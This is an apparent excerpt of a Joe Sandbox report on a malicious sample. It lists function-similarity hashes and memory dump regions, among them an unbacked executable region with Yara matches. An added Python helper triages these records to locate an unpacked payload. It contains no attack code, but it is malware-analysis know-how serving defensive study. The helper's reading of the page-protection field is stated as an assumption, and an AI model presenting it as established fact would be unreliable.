                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                                                                                                                                                                                          • Instruction ID: fafd2c305fa30de8266e08fde3152fb23d27fc24ba4380c9d819510652bcf668
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B12075A04301BFD7118F24EC41B6BBBE1BFD9314F108A2EF898A32A0D7759D549B4A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction ID: 620d8e7634948c83e41be619da85afde0703459452a904dc5d4b0bb006f825f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9C15DB29087418FC360CF68CC96BABBBE1BF85318F09492DD1D9C6342D778A155CB45
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction ID: b0da67189007bcc97d6055f8bbbbefa6b2a6acbc0e85e8bb44e11b41e7f0aee1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C15DB29087418FC360CF68DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB0A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
                                                                                                                                                                                                                                                          • Instruction ID: dd2d80b8d0343b75292a1bc903663831d237cf47dfcb5a5fb2b0b329c0d3d34d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C391F4366043018FC715DF18C8A092BB3E2FFE9754F1A846DE8858B754EB32E855CB82
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
                                                                                                                                                                                                                                                          • Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A68118F5A083515FC718CF18C0916ABB7E2ABE5304F14892EE4DA87342D639DD8ACB56
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e1d70730d9805ab43da1965e83e3ab577d4eeec424d8e09c9415cef84d649cfd
                                                                                                                                                                                                                                                          • Instruction ID: c8f6d2ce3aeac3151c2712779a29fc7c980eee780fdd34f864b88361fe091f88
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1d70730d9805ab43da1965e83e3ab577d4eeec424d8e09c9415cef84d649cfd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0951E0B590C3608BD310EF25D84266BB7F2BFD6304F18896DE4D94B391E3399906C79A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fbf73b4db14fa32777e1c213213ab1751344765e58354a883ecc528de0e49b53
                                                                                                                                                                                                                                                          • Instruction ID: f6c45a8c634b512175a9e70196cb5cb6fdc393861da751afe9f50228713363b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf73b4db14fa32777e1c213213ab1751344765e58354a883ecc528de0e49b53
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C75154B2219301ABD714DF24D881B3FB3E5EB88304F15582DF5C597281EB39E815CB9A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                                                                                                                                                                                          • Instruction ID: b97458d414d2c8a529f0686a584540c3dc1dc307e6f4f3ec8ecbad0c7b05ccfc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F61F7277599D04BE3299A7C4C113AE6E930FD3230F2DCB6AF9F5873E1D56588468341
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                                                                                                                                                                                          • Instruction ID: 71661ae89f4dd01ff183d23213b8ff6c182fb73d3ee196f738fd9547aa9552c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C361E73A649A9047E329CA3E4C613EA6E930FD7230F2DC76AEDF5873E1C56948468345
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8d99e5aa507edec36f3e144a94b9c52d172728baa8de697e93030f22942120a7
                                                                                                                                                                                                                                                          • Instruction ID: 47218a4efb1398991b075f4d3e47549c1334ed4e8bc5646021def08f2e15c37d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d99e5aa507edec36f3e144a94b9c52d172728baa8de697e93030f22942120a7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4651F0B590C3208BD310EF25984266BB7F2FFD2304F18895DE4D95B390E3399906C79A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                                                                                                                                                                                          • Instruction ID: 103638228cde8f0ddd279f3242b3a0c66f1c78d5dd6d37fd669a412139e610f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09610677A2935087D339CF14C8A13EBB6D2BBCA314F1A463DC4DA57291CB395902CB86
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 669b366a4ff503dc57d63458b0c9c1033c0bf3f78a44634955333919e8c7d94d
                                                                                                                                                                                                                                                          • Instruction ID: f65ea29c95e04f3797d9ae5c514ec91a591216c6aa963f0c1fe01fcc07f577a2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 669b366a4ff503dc57d63458b0c9c1033c0bf3f78a44634955333919e8c7d94d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0351CBB1A1D3508BD310EF29D842A2FB7F2AFD5208F18891DE4C94B290E7359506C74A
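The records above show two dump sources for the same process: the mapped image at 0x00400000 (based on PE: true) and an unbacked region at 0x02470000 (based on PE: false) that carries the Yara matches. They also show the same Opcode ID (ea139d43...) reported once from each region with different Instruction IDs, i.e. the same opcode sequence at a different address. The following Python is an added triage helper, not part of the Joe Sandbox report: it parses the report's "Memory Dump Source" records as printed here, flags dump regions that are not PE-backed and have Yara hits, and lists Opcode IDs shared across regions. The sample text is a constructed excerpt mirroring three of the records above; the decoding of the fifth dotted field of the .sdmp name as a PAGE_* protection value (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about the file-name layout, not something the report states.

```python
import re

# Constructed excerpt: three records in the same layout as the report's
# "Memory Dump Source" entries (two from the PE-backed image at 0x400000,
# one from the unbacked region at 0x2470000 that carries the Yara matches).
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
• Instruction ID: 71661ae89f4dd01ff183d23213b8ff6c182fb73d3ee196f738fd9547aa9552c9
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
• Instruction ID: b97458d414d2c8a529f0686a584540c3dc1dc307e6f4f3ec8ecbad0c7b05ccfc
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• Opcode ID: 8d99e5aa507edec36f3e144a94b9c52d172728baa8de697e93030f22942120a7
• Instruction ID: 47218a4efb1398991b075f4d3e47549c1334ed4e8bc5646021def08f2e15c37d
"""

# Windows PAGE_* protection constants. ASSUMPTION: the fifth dotted field of
# the .sdmp file name holds the region protection (0x40 in every record here).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}

SRC_RE = re.compile(
    r"Source File:\s*(\S+?\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "Memory Dump Source":
            cur = {"yara": False, "opcode_ids": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = SRC_RE.search(line)
        if m:
            name = m.group(1)
            fields = name[: -len(".sdmp")].split(".")
            cur["source"] = name
            cur["offset"] = int(m.group(2), 16)      # also fields[3]
            cur["pe_backed"] = m.group(3) == "true"
            cur["pid"] = int(fields[0], 16)
            cur["protect"] = PAGE_PROTECT.get(int(fields[4], 16), "UNKNOWN")
        elif line == "Yara matches":
            cur["yara"] = True
        elif line.startswith("Opcode ID:"):
            cur["opcode_ids"].append(line.split(":", 1)[1].strip())
    return records


def suspicious_regions(records):
    """Dump bases that are RWX, not backed by a loaded PE and Yara-hit: the
    usual footprint of an unpacked payload. Maps base -> function count."""
    out = {}
    for r in records:
        if (r["protect"] == "PAGE_EXECUTE_READWRITE" and not r["pe_backed"]
                and r["yara"]):
            out[r["offset"]] = out.get(r["offset"], 0) + len(r["opcode_ids"])
    return out


def shared_opcode_ids(records):
    """Opcode IDs reported from more than one dump base: the same opcode
    sequence relocated (operands differ, so Instruction IDs do not)."""
    where = {}
    for r in records:
        for oid in r["opcode_ids"]:
            where.setdefault(oid, set()).add(r["offset"])
    return {oid: sorted(b) for oid, b in where.items() if len(b) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, n in suspicious_regions(recs).items():
        print(f"unbacked RWX region with Yara hits at {base:#010x}: {n} function(s)")
    for oid, bases in shared_opcode_ids(recs).items():
        print(f"opcode id {oid[:16]}... seen at {[hex(b) for b in bases]}")
```

On the real report the 0x02470000 dump is the one to pull for string decryption and C2 extraction; the shared-opcode check gives a quick map from functions in the unpacked stage back to their counterparts in the original image.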
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
• Instruction ID: 0b4ae113e336fdda47d5a5c30e1157a43d4a28d531b482a6db273e11db2cbd24
• Opcode Fuzzy Hash: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8510B3A64BD904BE328CA3D5C2136669934FE7230B2DC76EE9B18B3F5D5A948429314
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                                                                                                                                                                                          • Instruction ID: 59add0b6ac401b792bf6ca932ddb3aab880f712b326be28d571c8b7eb3c2cde8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96512836A5A9904BE3288A3D4D2136679834FEB330F3DD77AA5B1873F5C5BD88024359
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                                                                                                                                                                                          • Instruction ID: 3674ee1043ff53bbacdcda023bd703922f0cd6b64f6926a4024f69ceb265895f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7461E039A08202CFE318CF69E89132AB3E2FFC9311F59857CE98587291D778D951CB44
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                                                                                                                                                                                          • Instruction ID: ab6498e56de857d2aa34f745454a5e266fb7a23a6ef2afc416aac10880d8be47
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D511827B259D04FC724AE3C4C512AE6A539BD723872D836BE8B4C73E5D6768C428390
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                                                                                                                                                                                          • Instruction ID: b4bd1d43185d4267fc95ac4d79e73dc03833d4744d2df80aa086061bc0fab29c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B510636B159D04BC7149A7C4C413EAAA535BE733473D836BE8B4C73E5D62A8C4243D5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 118965be68ce0a266aa25a6a3d912e941c05471a7a719cf9ff2a777562e4374e
                                                                                                                                                                                                                                                          • Instruction ID: 7638d4de7161a4573df5edaf8fca49f5703127498d8729ddec384e2ffef7b120
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118965be68ce0a266aa25a6a3d912e941c05471a7a719cf9ff2a777562e4374e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B55106766583808BD7199F24C8A07BBBBE2EFC6314F1D996ED4D28B395E7349402C742
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                                                                                                                                                                                          • Instruction ID: 0b78acfa887ac4bf7ec5edae5232c13ab91a1a78a71aadaa877cac81d6d8c6d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3512837B6A9914BE338993C5C113AE6A834BD7234F2DC7BBF5B1873E5D5A588428340
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                                                                                                                                                                                          • Instruction ID: 1dbfe680f79b7bc42e4c2a034f6e37913707943d44f4a0eb3da3a59864a671cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43514C3B6499D14BE7288A3D5C113E66A834BE3334F3DC77BD9B1873E1D96948824349
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
Memory Dump Source
